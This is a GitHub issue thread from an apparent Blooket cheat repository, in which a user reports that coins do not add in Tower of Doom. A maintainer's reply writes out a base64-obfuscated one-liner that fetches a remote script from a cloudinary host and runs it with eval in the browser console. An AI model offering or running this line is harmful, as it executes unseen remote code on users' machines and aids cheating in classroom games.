### ISSUE TITLE
Coins don't add in on Tower of Doom

### ISSUE THREAD

**Issue by RandyPlayzMC** [glixzzy/blooket-hack#720]
Please fix.
I figured out the issue for my old case but this doesn't work on both of my computers.

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!<br>

Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by RandyPlayzMC** [comment]
I'm using Microsoft Edge
I'm on my personal computer connected to my own internet.
Pasting it into the console
It hasn't worked before
No, it's not the original code.

**Comment by RandyPlayzMC** [comment]
Actually, I think someone fixed it because it works fine now.
Thanks!

**Comment by RandyPlayzMC** [comment]
It doesn't work for bookmarklet

**Comment by glixzzy** [comment]
ya gotta run the script twice for it to work
